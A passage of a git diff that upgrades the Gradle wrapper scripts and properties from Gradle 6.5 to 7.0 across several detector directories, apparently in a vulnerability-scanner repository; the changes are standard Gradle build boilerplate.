--mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/solr_cve201917558/gradlew.bat b/google/detectors/rce/solr_cve201917558/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/solr_cve201917558/gradlew.bat +++ b/google/detectors/rce/solr_cve201917558/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/tomcat/ghostcat/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/tomcat/ghostcat/gradlew b/google/detectors/rce/tomcat/ghostcat/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/tomcat/ghostcat/gradlew +++ b/google/detectors/rce/tomcat/ghostcat/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/tomcat/ghostcat/gradlew.bat b/google/detectors/rce/tomcat/ghostcat/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/tomcat/ghostcat/gradlew.bat +++ b/google/detectors/rce/tomcat/ghostcat/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/vbulletin/cve201916759/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/vbulletin/cve201916759/gradlew b/google/detectors/rce/vbulletin/cve201916759/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/vbulletin/cve201916759/gradlew +++ b/google/detectors/rce/vbulletin/cve201916759/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed 